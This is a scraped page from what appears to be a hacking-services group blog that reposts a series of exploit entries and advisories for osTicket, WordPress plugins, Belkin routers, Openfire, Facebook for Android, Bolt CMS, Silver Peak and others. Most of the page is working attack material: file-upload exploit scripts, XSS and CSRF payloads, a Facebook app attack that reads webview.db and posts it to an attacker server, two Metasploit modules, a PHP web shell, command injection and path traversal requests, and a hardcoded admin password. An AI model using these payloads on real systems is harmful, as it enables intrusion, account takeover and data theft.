Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863164565

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/57111/info

osTicket is prone to multiple input-validation vulnerabilities including:

1. Multiple cross-site scripting vulnerabilities
2. An open-redirection vulnerability
3. Multiple SQL-injection vulnerabilities

An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.

http://www.example.com/learn/ostickRC/scp/l.php?url=http://www.example2.com
HireHackking 
source: https://www.securityfocus.com/bid/57111/info
 
osTicket is prone to multiple input-validation vulnerabilities including:
 
1. Multiple cross-site scripting vulnerabilities
2. An open-redirection vulnerability
3. Multiple SQL-injection vulnerabilities
 
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
 
osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.

http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22
HireHackking 
source: https://www.securityfocus.com/bid/57112/info

The Uploader plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Uploader 1.0.4 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/uploads",
'fileext'=>'php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.example.com/wordpress/wp-content/uploads/lo.php

lo.php
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/57128/info

Belkin Wireless Router is prone to a security vulnerability that may allow attackers to generate a default WPS PIN.

Successfully exploiting this issue may allow attackers to generate the default WPS PIN. This may lead to other attacks.

Belkin N900 F9K1104v1 is vulnerable; other versions may also be affected.

@author       : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012
 
'''
 
import sys
 
VERSION    = 0
SUBVERSION = 2
 
def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)
 
def wps_pin_checksum(pin):
    accum = 0
 
    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10
 
try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
except Exception:
    usage()
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt



Vendor:
================================
www.checkpoint.com



Product:
================================
IKEView.exe Fox beta 1

IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall
phase(1 & 2) packets being exchanged with switches and gateways.



Vulnerability Type:
======================
Stack Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================
IKEView.exe is vulnerable to local stack based buffer overflow when parsing
an malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after
IKEView parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.


quick GDB register dump:
------------------------

EAX 00000000
ECX 41414141
EDX 7774B4AD ntdll.7774B4AD
EBX 00000000
ESP 0018E0E0
EBP 0018E100
ESI 00000000
EDI 00000000
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)

-----------SEH Chain---------

0:000> !exchain
0018f870: 42424242
Invalid exception stack at 41414141
0:000>
0018f870: 42424242
Invalid exception stack at 41414141
0:000>

0018F868 |02004AE0 àJ. ASCII "File loaded in 08 minutes, 01 seconds."
0018F86C |41414141 AAAA
0018F870 |41414141 AAAA Pointer to next SEH record
0018F874 |42424242 BBBB SE handler


Quick Buffer Overflow POC :
===========================


1) Below python file to create POC save as .py it will generate POC file,
open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!

seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B'
ASCII char.

file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4444+seh
x.write(payload)
x.close()

print "\n=======================================\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=========================================\n"



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
High



Description:
==========================================================


Vulnerable Product: [+] IKEView.exe Fox beta 1


Vulnerable File Type: [+] .elg


Affected Area(s): [+] Local OS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/57152/info

Multiple themes from WPScientist for WordPress are prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

The following themes are vulnerable:

Lightspeed version 1.1.2
Eptonic version 1.4.3
Nuance version 1.2.3 

=================== EXPLOIT====================
<?php

$uploadfile="bangla.php"; 
$ch =
curl_init("http://www.example.com/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access: http://www.example.com/wp-content/uploads/2013/01/bangla.php
HireHackking 
source: https://www.securityfocus.com/bid/57145/info

WHMCS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.

WHMCS 5.0 and 5.1 are vulnerable; other versions may also be affected. 

http://www.example.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}
HireHackking 
source: https://www.securityfocus.com/bid/57156/info

TomatoCart is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and create files with arbitrary shell script which may aid in further attacks.

TomatoCart versions 1.1.5 and 1.1.8 are vulnerable. 

POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
HireHackking 
source: https://www.securityfocus.com/bid/57169/info

Havalite CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

Havalite CMS 1.1.7 is vulnerable; other versions may also be affected. 

http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-XSS.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Persistent & Reflected XSS


CVE Reference:
==============
N/A



Vulnerability Details:
=====================

1) Persistent XSS exists when creating an Group Chat Bookmark, XSS will
execute each time victim accesses
the 'Group Chat Bookmarks' web page vuln parameter 'groupchatName' XSS will
be stored in 'ofbookmark'
table in 'bookmarkName' column of the MySQL DB and will be under
boomarkType as 'group_chat'.


2) Persistent XSS exists when creating URL Bookmarks, vuln parameter
'urlName' XSS will be stored in 'ofbookmark' table in
'bookmarkName' column of the MySQL DB will be under column boomarkType as
'url'.


3) Reflected XSS entry point exists in search parameter, script tags fail
but we can defeat using onMouseMove() JS function.


Exploit code(s):
===============

1) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat

Inject <script>alert(666)</script> payload into the 'Group Chat Name' field
then click 'Create'.


2) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url

Inject <script>alert('HELL')</script> payload into the 'URL Name' field
then click 'Create'.


3) Reflected XSS:
http://localhost:9090/server-session-details.jsp?hostname=
"/><script>alert(666)</script>


4) Reflected XSS:
http://localhost:9090/group-summary.jsp?search="
onMouseMove="alert('hyp3rlinx')



Disclosure Timeline:
=========================================================

Vendor Notification:  NA
Sept 14, 2015  : Public Disclosure




Exploitation Technique:
=======================
Local & Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+]  POST & GET


Vulnerable Product:             [+]  Openfire 3.10.2


Vulnerable Parameter(s):        [+]  groupchatName, urlName, hostname,
search


Affected Area(s):               [+]  Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Privilege escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.





Exploit code(s):
===============

Become admin!

http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on




Disclosure Timeline:
=========================================================

Vendor Notification: NA
Sept 14, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local or Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] Openfire 3.10.2


Vulnerable Parameter(s):        [+] isadmin


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/57173/info

Facebook for Android is prone to an information-disclosure vulnerability.

Successful exploits allows an attacker to gain access to sensitive information. Information obtained may aid in further attacks.

Facebook for Android 1.8.1 is vulnerable; other versions may also be affected.

++++++ Attacker's app (activity) ++++++
  
  // notice: for a successful attack, the victim user must be logged-in
  // to Facebook in advance.
  public class AttackFacebook extends Activity {

      // package name of Facebook app
      static final String FB_PKG = "com.facebook.katana";
  
      // LoginActivity of Facebook app
      static final String FB_LOGIN_ACTIVITY
           = FB_PKG + ".LoginActivity";
  
      // FacebookWebViewActivity of Facebook app
      static final String FB_WEBVIEW_ACTIVITY
           = FB_PKG + ".view.FacebookWebViewActivity";
  
      @Override
      public void onCreate(Bundle bundle) {
          super.onCreate(bundle);
          attack();
      }
  
      // main method
      public void attack() {
          // create continuation_intent to call FacebookWebViewActivity.
          Intent contIntent = new Intent();
          contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
          // URL pointing to malicious local file.
          // FacebookWebViewActivity will load this URL into its WebView.
          contIntent.putExtra("url", "file:///sdcard/attack.html");
  
          // create intent to be sent to LoginActivity.
          Intent intent = new Intent();
          intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
          intent.putExtra("login_redirect", false);
  
          // put continuation_intent into extra data of the intent.
          intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
  
          // call LoginActivity
          this.startActivity(intent);
      }
  }

  ++++++ Attacker's HTML/JavaScript file ++++++
  
  <!--
  attacker's app should put this file to /sdcard/attack.html in advance
  -->
 <html>
  <body onload="doAttack()">
  <h1>attack.html</h1>
  <script>
  // file path to steal. webview.db can be a good target for attackers
  // because it contains cookies, formdata etc.
  var target = "file:///data/data/com.facebook.katana/databases/webview.db";
  
  // get the contents of the target file by XHR
  function doAttack() {
      var xhr1 = new XMLHttpRequest();
      xhr1.overrideMimeType("text/plain; charset=iso-8859-1");
      xhr1.open("GET", target);
      xhr1.onreadystatechange = function() {
          if (xhr1.readyState == 4) {
              var content = xhr1.responseText;
              // send the content of the file to attacker's server
              sendFileToAttackerServer(content);
              // for debug
              document.body.appendChild(document.createTextNode(content));
          }
      };
      xhr1.send();
  }
  
  // Send the content of target file to the attacker's server
  function sendFileToAttackerServer(content) {
      var xhr2 = new XMLHttpRequest();
      xhr2.open("POST", "http://www.example.jp/";);
      xhr2.send(encodeURIComponent(content));
  }
  </script>
  </body>
  </html>
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-CSRF.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).


Vulnerability Type:
=================================
Cross site request forgery (CSRF)



CVE Reference:
==============
N/A





Vulnerability Details:
=====================
No CSRF tokens exists allowing us to take malicious actions against the
application.

1- change admin password.

2- add aribitrary users to the system

3- edit server settings e.g. turn off SSL.

4- Add rogue malicious clients with permit access (Allow all XMPP clients
to connect)

and more...



Exploit code(s):
===============

1) change admin password

<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>

<form id="HELL" action="http://localhost:9090/user-password.jsp"
method="post">
<input type="text" name="username" value="admin" >
<input type="text" name="password" value="abc123">
<input type="text" name="passwordConfirm" value="abc123" >
<input type="password" name="update" value="Update+Password" >
</form>


2) add aribitrary users
http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User


3) edit server settings & turn off SSL
http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties


4) add rogue malicious clients
http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add



Disclosure Timeline:
=========================================================
Vendor Notification:  NA
Sept 14, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+]  POST & GET


Vulnerable Product:             [+]  Openfire 3.10.2


Vulnerable Parameter(s):        [+]  update, create, sslEnabled, other


Affected Area(s):               [+]  Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability in Windows Media Center. By supplying
        an UNC path in the *.mcl file, a remote file will be automatically downloaded,
        which can result in arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r',
        ],
      'References'     =>
        [
          ['CVE', '2015-2509'],
          ['MSB', 'MS15-100']
        ],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'false'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 8 2015",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
          OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
        ], self.class)

      deregister_options('FILE_CONTENTS')
  end

  def generate_mcl
    %Q|<application run="#{unc}" />|
  end

  def primer
    self.file_contents = generate_payload_exe
    print_status("Malicious executable at #{unc}...")

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    mcl = generate_mcl
    file_create(mcl)
  end

end
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'CMS Bolt File Upload Vulnerability',
      'Description'     => %q{
          Bolt CMS contains a flaw that allows an authenticated remote
          attacker to execute arbitrary PHP code. This module was
          tested on version 2.2.4.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Tim Coen', # Vulnerability Disclosure
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'      =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
        ],
      'DisclosureDate'  => 'Aug 17 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Bolt 2.2.4', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
        OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
      ], self.class)
  end

  def check
    cookie = bolt_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'bolt'),
      'cookie'      => cookie
    )

    if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def fname
    datastore['FOLDERNAME']
  end

  def bolt_login(user, pass)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'bolt', 'login')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'bolt', 'login'),
      'cookie'      => session_cookie,
      'vars_post'   => {
        'username'  => user,
        'password'  => pass,
        'action'    => 'login'
      }
    )

    return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
    nil
  end

  def get_token(cookie, fname)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'cookie'      => cookie
    )

    if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
      return Regexp.last_match[1]
    end
    nil
  end

  def rename_payload(cookie, payload, fname)
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'async', 'renamefile'),
      'vars_post'   => {
        'namespace' => 'theme',
        'parent'    => fname,
        'oldname'   => "#{payload}.png",
        'newname'   => "#{payload}.php"
      },
      'cookie'      => cookie
    )

    return true if res && res.code == 200 && res.body.include?('1')
    nil
  end

  def exploit
    vprint_status("#{peer} - Authenticating using #{username}:#{password}")

    cookie = bolt_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Bolt.")

    token = get_token(cookie, fname)
    fail_with(Failure::Unknown, 'No token found.') if token.nil?
    vprint_good("#{peer} - Token \"#{token}\" found.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = Rex::Text.rand_text_alpha_lower(10)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
    data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data,
      'cookie'    => cookie
    )

    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
    vprint_good("#{peer} - Uploaded the payload.")

    rename = rename_payload(cookie, payload_name, fname)
    fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?

    php_file_name = "#{payload_name}.php"
    payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_file_name)
    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'     => payload_url,
      'method'  => 'GET'
    )
  end
end
HireHackking 
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Silver Peak VXOA Multiple Vulnerabilities
Affected versions: Silver Peak VX < 6.2.11

PDF:
http://www.security-assessment.com/files/documents/advisory/Silverpeak-Advisory-Final.pdf

+-----------+
|Description|
+-----------+
The Silver Peak VX virtual appliance running VXOA before version 6.2.11
contains a number of security vulnerabilities, including command
injection, unauthenticated file read, mass assignment, shell upload, and
hardcoded credentials. By combining these vulnerabilities, an attacker
may remotely obtain root privileges on the underlying host.

+------------+
|Exploitation|
+------------+
==Command Injection==
A user with administrative access to the REST JSON interface of the VX
web server may execute arbitrary commands on the operating system. The
injection point lies in the "snmp" call, which does not sanitise the
"auth_key" parameter before including it in an executed command string.
The following command injection PoC writes the user's id to a file on
the filesystem.
[Command Injection PoC]
POST /rest/json/snmp HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Cookie: connect.sid=[VALID];

{"access":{"rocommunity":"public"},"listen":{"enable":true},"traps":{"trap_community":"public","enable":true},"auto_launch":true,"sysdescr":"",
"syscontact":"","syslocation":"","v3":{"users":{"admin":{"hash_type":"sha","auth_key":"a;echo
`id` >
/var/tmp/cmd_inj","self":"admin","privacy_key":"","privacy_type":"aes-128","enable":false}}},"encAuth":false,"encPri":false}

==Unauthenticated File Read==
A user with the ability to access the VX web server interface may make
an unauthenticated call to a web interface function that allows them to
read arbitrary files on the disk with the permission of the web server
user "apache". Two functions are affected by this vulnerability,
"save_file.php" and "save_config_file.php".
[Unauthenticated File Read PoC]
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_file.php?ftype=log&fname=../../etc/passwd"

OR

curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_config_file.php?filename=../../../../../../../../etc/passwd"


==Mass Assignment==
A user with access to the REST JSON interface of the VX web server may
alter undocumented parameters of the "users" call, allowing them to
change a user's login shell to bash. This can be used to evade the
limited subshell enforced by the SSH server on the appliance.
[Mass assignment PoC]
POST /rest/json/users HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 366
Cookie: connect.sid=[VALID];

{"users":{"basic":{"self":"basic","enable":true,"gid":0,"password":"[SNIP]","shell":"/bin/bash"}},[SNIP
other users]}}

==Shell Upload==
A user with monitor or administrative access to the web interface of the
VX web server may upload a PHP shell in order to execute arbitrary
commands as the web server user "apache".  A POST request containing the
PHP shell is made to the "configdb_file.php" endpoint. This uploads the
shell to a directory with a randomly generated name corresponding to the
user's SOAP interface session. This random value may be obtained from
"home.php", and the uploaded shell accessed within that directory.  The
following PoC details uploading the shell, obtaining the SOAP directory
name, and using the shell.
[Shell upload PoC]
POST /6.2.5.0_52054/php/configdb_file.php?seenform=1 HTTP/1.1
Host: [HOST]
Cookie: PHPSESSID=[VALID];
Content-Type: multipart/form-data;
boundary=---------------------------18932870311933452824851992207
Content-Length: 301

-----------------------------18932870311933452824851992207
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/html

<?php
$cmd = $_GET["cmd"];
$output = shell_exec($cmd);
echo "$output";
?>
-----------------------------18932870311933452824851992207
#End of request

$curl -sk -b 'PHPSESSID=[VALID]'
"https://[HOST]/6.2.5.0_52054/php/home.php" | grep "flowFile"
  var flowFile =
"/opt/tms/lib/web/content/webui/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/";


$curl -sk
"https://[HOST]/6.2.5.0_52054/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/shell.php?cmd=id"
  uid=48(apache) gid=48(apache) groups=48(apache)


==Hardcoded Account==
The "spsadmin" account is predefined in the VX appliance, and is hidden
from user account lists in the web and subshell interfaces. The account
has a hardcoded password of "Silverpeak123", and cannot be logged into
through the regular web interface, or the subshell over SSH. However,
the account can log in via the web JSON interface, and execute JSON API
calls with administrative privileges. This can include creating new
users, with which an attacker may successfully log into the SSH or web
interfaces, and also exploiting the Command Injection bug detailed
earlier in this advisory.  The following PoC details the request and
credentials used to obtain a valid REST cookie:
[Hardcoded account login PoC]
POST /rest/json/login HTTP/1.1
Host: [host]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46

{"user":"spsadmin","password":"Silverpeak123"}

==Subshell Breakout==
An administrative user with access to the enable menu of the login
subshell may enter a hardcoded string to obtain a bash shell on the
operating system.
[Subshell Breakout POC]
silverpeak > en
silverpeak # _spsshell
[admin@silverpeak root]# id
uid=0(admin) gid=0(root) groups=0(root)

+----------+
| Solution |
+----------+
Users of the 6.2.x branch should upgrade to version 6.2.11 of VXOA in
order to protect against these issues. Silver Peak has advised that
users of the 7.2.x branch are only vulnerable to the command injection
vulnerability, which will be patched in version 7.3.

+-------------------+
|Disclosure Timeline|
+-------------------+
01/04/2015 - Email sent to info address asking for a security contact.
09/04/2015 - Email sent to info and security addresses asking for a
security contact.
21/04/2015 - Email sent to CEO regarding security contact.
21/04/2015 - Response from CEO providing security contact details.
22/04/2015 - Email sent to security contact asking for PGP key.
22/04/2015 - Received PGP key, sent advisory.
22/04/2015 - Email received confirming receipt of advisory.
22/06/2015 - Email sent asking for update on advisory.
23/06/2015 - Vendor details fixes in place, states that all issues have
been fixed in 6.2.11.0, and only the command injection remains unfixed
in the 7.2.x version.
17/07/2015 - Email sent regarding resolution of unfixed issue.
17/07/2015 - Received response stating the command injection issue is
only relevant to customers who have disabled shell access.
21/07/2015 - Email sent asking for clarification on the vendor stance.
21/07/2015 - Vendor states command injection vulnerability is only an
issue for customers with shell access disabled as they otherwise have
the ability to execute commands through the shell, and that the issue
will be fixed in release 7.3.
09/09/2015 - Public advisory release.

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
